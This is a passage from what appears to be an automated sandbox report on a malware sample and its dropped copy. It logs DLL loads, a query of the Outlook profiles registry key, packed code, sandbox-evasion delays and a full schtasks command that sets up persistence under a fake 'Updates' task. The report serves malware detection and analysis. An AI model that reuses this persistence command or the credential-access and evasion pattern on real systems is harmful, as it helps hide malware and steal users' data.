Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: edputil.dll
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: jKqPSehspS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: jKqPSehspS.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 0_2_0150EE60 push esp; iretd 0_2_0150EE61
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 9_2_01260C6D push edi; retf 9_2_01260C7A
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 10_2_00D0EE60 push esp; iretd 10_2_00D0EE61
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 10_2_00D0FCB8 push esp; retf 10_2_00D0FCBE
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 10_2_06FF9EAF push ebp; retf 10_2_06FF9EBE
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 10_2_06FF9E18 push ebp; retf 10_2_06FF9E26
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 10_2_06FF17F6 push es; retf 10_2_06FF1804
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_01280C6D push edi; retf 14_2_01280C7A
                    Source: jKqPSehspS.exe | Static PE information: section name: .text entropy: 7.794593073066602
                    Source: BLpvFR.exe.0.dr | Static PE information: section name: .text entropy: 7.794593073066602
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe | File created: C:\Users\user\AppData\Roaming\BLpvFR.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe - Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe - Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara matchFile source: Process Memory Space: jKqPSehspS.exe PID: 1308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BLpvFR.exe PID: 2660, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 1500000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 3250000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 3050000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 7FD0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 8FD0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 9180000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: A180000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 1260000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 2ED0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 2C20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: D00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 2720000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 4720000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 7000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 8000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 8190000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 9190000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 1280000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 2DB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 13F0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8632
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 440
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7883
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 820
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWindow / User API: threadDelayed 4765
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWindow / User API: threadDelayed 5081
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWindow / User API: threadDelayed 7748
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWindow / User API: threadDelayed 2094
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 2344Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5444Thread sleep count: 8632 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5944Thread sleep count: 440 > 30
